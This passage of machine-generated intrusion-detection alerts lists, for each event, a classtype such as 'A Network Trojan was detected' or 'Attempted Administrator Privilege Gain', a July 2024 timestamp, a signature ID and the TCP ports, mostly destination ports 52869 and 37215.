                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.119232
                      SID:2027339
                      Source Port:45442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.781631
                      SID:2831300
                      Source Port:32962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.888773
                      SID:2027339
                      Source Port:59730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:31.562284
                      SID:2027339
                      Source Port:40914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.060021
                      SID:2835222
                      Source Port:36954
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.685214
                      SID:2835222
                      Source Port:43156
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.093934
                      SID:2027339
                      Source Port:42768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.437584
                      SID:2829579
                      Source Port:48476
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.702462
                      SID:2025132
                      Source Port:49620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.354373
                      SID:2835222
                      Source Port:54522
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.185047
                      SID:2027339
                      Source Port:44486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.093159
                      SID:2027339
                      Source Port:40594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.106017
                      SID:2025132
                      Source Port:60198
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.417957
                      SID:2027339
                      Source Port:49384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.305486
                      SID:2027339
                      Source Port:58730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.347952
                      SID:2027339
                      Source Port:51988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.514709
                      SID:2027339
                      Source Port:40724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.486069
                      SID:2027339
                      Source Port:59824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.784582
                      SID:2027339
                      Source Port:44058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:01.154408
                      SID:2025132
                      Source Port:45424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.464582
                      SID:2025132
                      Source Port:44744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.572723
                      SID:2831300
                      Source Port:36718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:10.772789
                      SID:2027339
                      Source Port:45810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.527430
                      SID:2027339
                      Source Port:48194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.994808
                      SID:2025132
                      Source Port:40326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.592874
                      SID:2829579
                      Source Port:42532
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.426493
                      SID:2027339
                      Source Port:46616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.641445
                      SID:2027339
                      Source Port:45218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.466939
                      SID:2027339
                      Source Port:51586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.721858
                      SID:2831300
                      Source Port:34176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.014684
                      SID:2829579
                      Source Port:52184
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.775925
                      SID:2025132
                      Source Port:53286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.217231
                      SID:2027339
                      Source Port:44802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.002874
                      SID:2027339
                      Source Port:53416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.619289
                      SID:2835222
                      Source Port:54762
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.526129
                      SID:2831300
                      Source Port:56604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.999855
                      SID:2025132
                      Source Port:47084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.582155
                      SID:2027339
                      Source Port:60314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.678174
                      SID:2829579
                      Source Port:34534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.695131
                      SID:2025132
                      Source Port:32900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.634433
                      SID:2027339
                      Source Port:51218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.554950
                      SID:2027339
                      Source Port:55604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.107285
                      SID:2025132
                      Source Port:45236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.479091
                      SID:2835222
                      Source Port:44440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.204856
                      SID:2831300
                      Source Port:34662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.118555
                      SID:2025132
                      Source Port:52672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.531553
                      SID:2835222
                      Source Port:34424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.716020
                      SID:2027339
                      Source Port:33994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.844842
                      SID:2027339
                      Source Port:36014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.648426
                      SID:2829579
                      Source Port:51144
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.777005
                      SID:2835222
                      Source Port:39672
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.780090
                      SID:2835222
                      Source Port:39734
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.823353
                      SID:2027339
                      Source Port:55312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.593936
                      SID:2027339
                      Source Port:55200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.449806
                      SID:2025132
                      Source Port:45378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.627062
                      SID:2835222
                      Source Port:48346
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:45.931745
                      SID:2027339
                      Source Port:51346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.472907
                      SID:2025132
                      Source Port:50824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.554912
                      SID:2829579
                      Source Port:42024
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.662427
                      SID:2027339
                      Source Port:53360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245589
                      SID:2829579
                      Source Port:39622
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.728679
                      SID:2831300
                      Source Port:40680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.468125
                      SID:2831300
                      Source Port:40038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.961618
                      SID:2025132
                      Source Port:57998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.787088
                      SID:2027339
                      Source Port:41078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.606013
                      SID:2027339
                      Source Port:57536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.675032
                      SID:2025132
                      Source Port:37540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.133658
                      SID:2027339
                      Source Port:44284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859779
                      SID:2835222
                      Source Port:46084
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.424851
                      SID:2829579
                      Source Port:40974
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.445692
                      SID:2831300
                      Source Port:39124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.402081
                      SID:2829579
                      Source Port:45950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.216294
                      SID:2831300
                      Source Port:36980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.515352
                      SID:2829579
                      Source Port:47652
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.750574
                      SID:2027339
                      Source Port:40702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.079797
                      SID:2829579
                      Source Port:38900
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.454602
                      SID:2027339
                      Source Port:38704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.685213
                      SID:2835222
                      Source Port:47900
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.369794
                      SID:2025132
                      Source Port:60136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.106017
                      SID:2025132
                      Source Port:59942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.508900
                      SID:2027339
                      Source Port:58722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.005197
                      SID:2025132
                      Source Port:47112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.291604
                      SID:2027339
                      Source Port:51636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.574959
                      SID:2829579
                      Source Port:44520
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.916755
                      SID:2025132
                      Source Port:51364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.853184
                      SID:2835222
                      Source Port:34140
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.497165
                      SID:2027339
                      Source Port:42590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.372597
                      SID:2025132
                      Source Port:56352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.221858
                      SID:2027339
                      Source Port:48098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.626588
                      SID:2829579
                      Source Port:49376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.452253
                      SID:2831300
                      Source Port:53944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.328921
                      SID:2831300
                      Source Port:57256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.024016
                      SID:2025132
                      Source Port:42764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.198584
                      SID:2831300
                      Source Port:37630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.706531
                      SID:2027339
                      Source Port:36292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.038216
                      SID:2025132
                      Source Port:53690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:56.877705
                      SID:2027339
                      Source Port:40160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830570
                      SID:2835222
                      Source Port:47186
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.366780
                      SID:2831300
                      Source Port:37398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.648426
                      SID:2829579
                      Source Port:46926
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325898
                      SID:2829579
                      Source Port:42040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.598746
                      SID:2025132
                      Source Port:60868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.549242
                      SID:2027339
                      Source Port:55962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.487901
                      SID:2025132
                      Source Port:55318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.542034
                      SID:2835222
                      Source Port:50700
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.685237
                      SID:2027339
                      Source Port:48922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.763322
                      SID:2829579
                      Source Port:41236
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.280683
                      SID:2027339
                      Source Port:54286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.571555
                      SID:2829579
                      Source Port:38744
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.712957
                      SID:2027339
                      Source Port:59088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.889998
                      SID:2829579
                      Source Port:34894
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.809290
                      SID:2027339
                      Source Port:35148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.439166
                      SID:2835222
                      Source Port:53286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.504672
                      SID:2027339
                      Source Port:33018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.714969
                      SID:2027339
                      Source Port:59472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.253106
                      SID:2027339
                      Source Port:49980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.348451
                      SID:2027339
                      Source Port:60410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.373413
                      SID:2027339
                      Source Port:56546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.482858
                      SID:2027339
                      Source Port:56684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.483885
                      SID:2831300
                      Source Port:39280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.131822
                      SID:2027339
                      Source Port:55624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.688553
                      SID:2027339
                      Source Port:39172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.570652
                      SID:2025132
                      Source Port:40406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.471777
                      SID:2027339
                      Source Port:38514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.656252+0200
                      SID:2027339
                      Source Port:35332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.676834+0200
                      SID:2835222
                      Source Port:38402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.342361+0200
                      SID:2835222
                      Source Port:54890
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.868951+0200
                      SID:2835222
                      Source Port:53612
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.547499+0200
                      SID:2027339
                      Source Port:55854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.706701+0200
                      SID:2027339
                      Source Port:42752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.693492+0200
                      SID:2027339
                      Source Port:33898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872982+0200
                      SID:2835222
                      Source Port:45300
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.332387+0200
                      SID:2835222
                      Source Port:42424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.695376+0200
                      SID:2027339
                      Source Port:41718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.606405+0200
                      SID:2027339
                      Source Port:45614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.716310+0200
                      SID:2027339
                      Source Port:36248
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:40.403015+0200
                      SID:2027339
                      Source Port:58066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.833379+0200
                      SID:2027339
                      Source Port:40874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.669936+0200
                      SID:2835222
                      Source Port:47918
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.349447+0200
                      SID:2835222
                      Source Port:58974
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.547499+0200
                      SID:2027339
                      Source Port:33694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.716311+0200
                      SID:2027339
                      Source Port:33778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.797460+0200
                      SID:2027339
                      Source Port:59872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.695376+0200
                      SID:2027339
                      Source Port:49442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.547499+0200
                      SID:2027339
                      Source Port:48692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.610692+0200
                      SID:2835222
                      Source Port:59976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.866516+0200
                      SID:2835222
                      Source Port:45960
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.349447+0200
                      SID:2835222
                      Source Port:37796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.823472+0200
                      SID:2027339
                      Source Port:38190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:48.865590+0200
                      SID:2835222
                      Source Port:41588
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.632661+0200
                      SID:2027339
                      Source Port:57116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.664967+0200
                      SID:2027339
                      Source Port:46442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.685966+0200
                      SID:2027339
                      Source Port:57716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.645873+0200
                      SID:2027339
                      Source Port:58262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.865110+0200
                      SID:2835222
                      Source Port:51910
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.485425+0200
                      SID:2027339
                      Source Port:47276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.332387+0200
                      SID:2835222
                      Source Port:46706
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:40.483444+0200
                      SID:2027339
                      Source Port:55164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.773805+0200
                      SID:2027339
                      Source Port:35144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.356816+0200
                      SID:2835222
                      Source Port:44378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:48.865590+0200
                      SID:2835222
                      Source Port:56288
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:52.581631+0200
                      SID:2027339
                      Source Port:52660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.674515+0200
                      SID:2835222
                      Source Port:60644
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:38.981827+0200
                      SID:2835222
                      Source Port:39064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.632661+0200
                      SID:2027339
                      Source Port:56270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.695376+0200
                      SID:2027339
                      Source Port:37638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872982+0200
                      SID:2835222
                      Source Port:44670
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.870658+0200
                      SID:2835222
                      Source Port:44846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.599872+0200
                      SID:2835222
                      Source Port:57132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.797460+0200
                      SID:2027339
                      Source Port:46050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.674515+0200
                      SID:2835222
                      Source Port:55942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.695376+0200
                      SID:2027339
                      Source Port:36312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.869216+0200
                      SID:2835222
                      Source Port:32850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.547499+0200
                      SID:2027339
                      Source Port:46940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872000+0200
                      SID:2835222
                      Source Port:57322
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:38.983933+0200
                      SID:2027339
                      Source Port:45224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:39.086384+0200
                      SID:2835222
                      Source Port:36954
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.359675+0200
                      SID:2835222
                      Source Port:47036
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.606405+0200
                      SID:2027339
                      Source Port:41742
